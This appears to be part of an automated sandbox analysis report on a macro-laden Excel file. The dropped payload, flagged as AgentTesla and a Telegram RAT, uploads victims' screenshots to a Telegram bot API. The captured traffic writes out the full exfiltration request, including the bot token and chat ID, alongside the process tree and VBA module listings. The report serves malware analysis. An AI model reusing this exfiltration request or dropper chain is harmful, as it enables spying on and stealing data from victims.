2022-04-08 10:13:49 UTC	1035	OUT	Data Raw: 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 Data Ascii: Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&
2022-04-08 10:13:49 UTC	1051	OUT	Data Raw: be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 4b 4c 8f ee 9f a9 fe 74 00 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 29 a8 a7 6f df 6e a7 d3 d6 a5 a6 47 f7 4f d4 ff 00 3a 00 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 52 d3 23 fb a7 ea 7f 9d 00 1b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 fa 28 01 9b 4f f7 db f4 ff 00 0a 36 9f Data Ascii: Q}O@Q}O@Q}O@SQNOKLtm?o(Sm?o(Sm?o(Sm?o)onGO:6m?o)P6m?o)P6m?o)P6SSR#O6(O6
2022-04-08 10:13:49 UTC	1067	OUT	Data Raw: 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 52 d3 23 fb a7 ea 7f 9d 00 1b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d4 b4 c8 fe e9 fa 9f e7 40 06 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b5 2d 32 3f ba 7e a7 f9 d0 01 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 Data Ascii: M>fxoo\|7FM>fR#&Oz7h=4(&Oz7i/F@xoo\|7FM>fxoo\|j8>-2?~z7h=4(&Oz7h=4(
2022-04-08 10:13:49 UTC	1083	OUT	Data Raw: ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e Data Ascii: }O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~
2022-04-08 10:13:49 UTC	1097	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 61 61 38 34 65 64 39 32 32 2d 2d 0d 0a Data Ascii: -----------------------------8da196aa84ed922--
2022-04-08 10:13:49 UTC	1097	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:49 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":129,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412829,"document":{"file_name":"user-082561 2022-04-08 02-18-30.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4FiUArdtJjc41fd6ZnrJbkrtlHPJgAC9QoAAkCUgFLYZ1Vy_w69rgEAB20AAyME","file_unique_id":"AQAD9QoAAkCUgFJy","file_size":13707,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOBYlAK3bSY3ONX3emZ6yW5K7ZRzyYAAvUKAAJAlIBS2GdVcv8Ova4jBA","file_unique_id":"AgAD9QoAAkCUgFI","file_size":111999},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.22	49180	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:57 UTC	1098	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da196f7fa188b0 Host: api.telegram.org Content-Length: 112587 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:13:57 UTC	1098	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:57 UTC	1098	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 66 37 66 61 31 38 38 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 66 37 66 61 31 38 38 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da196f7fa188b0Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da196f7fa188b0Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:13:57 UTC	1099	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ea e7 ba 31 a1 90 c8 b1 46 1b 6e e6 8c be 4f 7e 01 18 14 c4 b9 79 6f 0d a4 77 70 b4 c0 6e 20 5b b1 00 7a e7 7e 3b d5 5b fb a1 6d a4 c8 db 43 b3 3c aa aa 7b 9d ed 46 80 f0 e0 6d 55 49 6e 36 c8 48 fe 2c 75 1f 87 3f ad 65 cf ef 59 99 73 6b 63 42 da e4 cb 6b 6b 23 8f 9a 75 53 f2 f4 04 ae ef cb 8a 75 cc e2 de 2d e5 73 f8 e3 b6 6a ae 9e 73 a6 e9 87 fd 84 ff Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?1FnO~yowpn [z~;[mC<{FmUIn6H,u?eYskcBkk#uSu-sjs
2022-04-08 10:13:57 UTC	1115	OUT	Data Raw: 35 48 56 77 89 1c 4d 80 0b 7e ea 40 87 86 5e f9 1c 7f 9f 7a c6 92 de e2 5d 56 3b 80 65 74 b6 dc 15 0b 8c 85 70 06 37 6f eb f2 9e 7a fa d7 47 3d b5 bd ca 81 71 04 72 81 c8 12 20 6c 7e 75 0f f6 5e 9d ff 00 3e 16 bf f7 e5 7f c2 a9 34 2d 4c fd 02 23 15 f5 f8 2b 20 2c a8 df bc 93 79 e5 9c f5 c9 e2 a3 4d 2a e8 69 86 db cb 1b 4c 05 8a 6e 1f eb 76 ed c7 d3 a1 fa 8a da 82 d6 da d7 77 d9 ed e2 87 77 de f2 d0 2e 7e b8 a9 73 49 ea c6 b4 32 12 c2 6f ed 91 71 2a cc 42 85 f2 dd 0c 7b 54 05 c1 53 9f 9b ae 7a 71 cd 55 96 de 2d 3b 4f b0 fb 5c 11 79 68 ad e6 c4 ce 8a 4c 98 18 6e 48 04 8c 11 c1 cf 3c 57 43 9a 33 49 82 39 f8 34 e9 e4 5d 35 a5 8e 7f 2e 38 10 0f 2f 66 63 60 72 49 dd c8 e3 1f 77 9e 2b 47 54 86 59 a5 87 f7 32 cd 00 0d b9 62 75 56 0d d8 e4 91 c6 32 31 9e fc 83 57 Data Ascii: 5HVwM~@^z]V;etp7ozG=qr l~u^>4-L#+ ,yMiLnvww.~sI2oqB{TSzqU-;O\yhLnH<WC3I94]5.8/fc`rIw+GTY2buV21W
2022-04-08 10:13:57 UTC	1131	OUT	Data Raw: 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d Data Ascii: #Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~u>-
2022-04-08 10:13:57 UTC	1147	OUT	Data Raw: 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 Data Ascii: Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&
2022-04-08 10:13:57 UTC	1162	OUT	Data Raw: be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a7 d1 40 0c da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 4b 4c 8f ee 9f a9 fe 74 00 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 53 e8 a0 06 6d 3f df 6f d3 fc 29 a8 a7 6f df 6e a7 d3 d6 a5 a6 47 f7 4f d4 ff 00 3a 00 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 29 f4 50 03 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 52 d3 23 fb a7 ea 7f 9d 00 1b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 fa 28 01 9b 4f f7 db f4 ff 00 0a 36 9f Data Ascii: Q}O@Q}O@Q}O@SQNOKLtm?o(Sm?o(Sm?o(Sm?o)onGO:6m?o)P6m?o)P6m?o)P6SSR#O6(O6
2022-04-08 10:13:57 UTC	1178	OUT	Data Raw: 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 52 d3 23 fb a7 ea 7f 9d 00 1b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d4 b4 c8 fe e9 fa 9f e7 40 06 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 37 8f 46 ff 00 be 4d 3e 8a 00 66 f1 e8 df f7 c9 a3 78 f4 6f fb e4 d3 e8 a0 06 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b5 2d 32 3f ba 7e a7 f9 d0 01 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 a3 7f df 26 8d e3 d1 bf ef 93 4f a2 80 19 bc 7a 37 fd f2 68 de 3d 1b fe f9 34 fa 28 01 9b c7 Data Ascii: M>fxoo\|7FM>fR#&Oz7h=4(&Oz7i/F@xoo\|7FM>fxoo\|j8>-2?~z7h=4(&Oz7h=4(
2022-04-08 10:13:57 UTC	1194	OUT	Data Raw: ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e Data Ascii: }O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?v}=hZ)O6)O6)O6dtOi~ME;~
2022-04-08 10:13:57 UTC	1208	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 36 66 37 66 61 31 38 38 62 30 2d 2d 0d 0a Data Ascii: -----------------------------8da196f7fa188b0--
2022-04-08 10:13:58 UTC	1208	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:58 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":130,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412838,"document":{"file_name":"user-082561 2022-04-08 02-38-31.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4JiUArlJUqg5p1bF0qNYP-hrmcNkAAC9goAAkCUgFL9xAttX2j9jgEAB20AAyME","file_unique_id":"AQAD9goAAkCUgFJy","file_size":13707,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOCYlAK5SVKoOadWxdKjWD_oa5nDZAAAvYKAAJAlIBS_cQLbV9o_Y4jBA","file_unique_id":"AgAD9goAAkCUgFI","file_size":111999},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Target ID:	0
Start time:	12:13:15
Start date:	08/04/2022
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f630000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	12:13:19
Start date:	08/04/2022
Path:	C:\Users\user\AppData\Local\Temp\dropped.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\dropped.exe
Imagebase:	0x12e0000
File size:	546816 bytes
MD5 hash:	E2D002B5319A8CE475A7F355254A67A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 58%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	3
Start time:	12:13:23
Start date:	08/04/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Imagebase:	0x310000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Target ID:	4
Start time:	12:13:36
Start date:	08/04/2022
Path:	C:\Users\user\AppData\Roaming\BINGO\BINGO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\BINGO\BINGO.exe"
Imagebase:	0x900000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Show Windows behavior

Target ID:	6
Start time:	12:13:44
Start date:	08/04/2022
Path:	C:\Users\user\AppData\Roaming\BINGO\BINGO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\BINGO\BINGO.exe"
Imagebase:	0xe00000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
cjpojbxatghyewAPIs: 42, Strings: 9, Number of lines: 23, Relevance: 134.023

APIs	Meta Information
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Len
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Chr$
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Val
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Mid$
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Len
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Chr$
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Val
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Mid$
Environ	Environ("TEMP") -> C:\Users\Albus\AppData\Local\Temp
CreateObject	CreateObject("MSXML2.ServerXMLHTTP.6.0")
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Len
Part of subcall function wyfqtgmzehxe@ThisWorkbook: Chr$
